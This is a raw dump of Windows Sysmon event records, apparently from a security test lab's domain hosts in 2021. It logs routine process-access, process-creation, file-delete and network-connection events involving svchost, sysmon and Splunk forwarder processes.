10341000x8000000000000000806870Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F3CA-60EB-5A79-00000000D001}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806869Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806868Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806867Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806866Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806865Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806864Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806863Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806862Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806861Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806860Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F3CA-60EB-5A79-00000000D001}736C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806859Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.285{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F3CA-60EB-5A79-00000000D001}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806858Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.286{0C1E0330-F3CA-60EB-5A79-00000000D001}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:26.403{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F2433A24315A2832E989A303883D45F6,SHA256=69C87F84752497B52D6BE7F9249FE99695D4753907B7054B4BC091F35487486C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:26.403{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACF9E7083283591250BABF71865EFFAF,SHA256=1348CB8A97087BB70CD45899F17E3E4CC98BAE3EF867EA8150210A87444FBDBF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:18.382{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57215-false10.0.1.14win-dc-890.attackrange.local49676- 354300x80000000000000001047365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:17.791{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsefalse89.248.165.74recyber.net59120-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001047364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:26.036{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\new 1@2021-07-12_074744MD5=BB87A22CABB0E1CBFD2B4B30711AA20C,SHA256=FA6EE1E8A154941D13A0F4520798BEDC4C573EFE7A1DA8CF9B2F30182DF2332E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:27.956{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0439D4DEA899D4E67DEDC25566EC32C,SHA256=3758D5E2D5B4E292B87D5085B81A895559B380CE7893077B2ECAC3F7A1339B8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806901Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.754{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEFC52F194919D7FB15E3AC1DA179006,SHA256=7449DEBF502309F1CB57CF61D47E89845981C025BFC42B958D86C9F75F46BD40,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806900Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.984{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57215-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 
10341000x8000000000000000806899Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.676{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F3CB-60EB-5C79-00000000D001}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806898Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806897Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806896Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806895Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806894Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806893Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806892Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806891Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806890Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 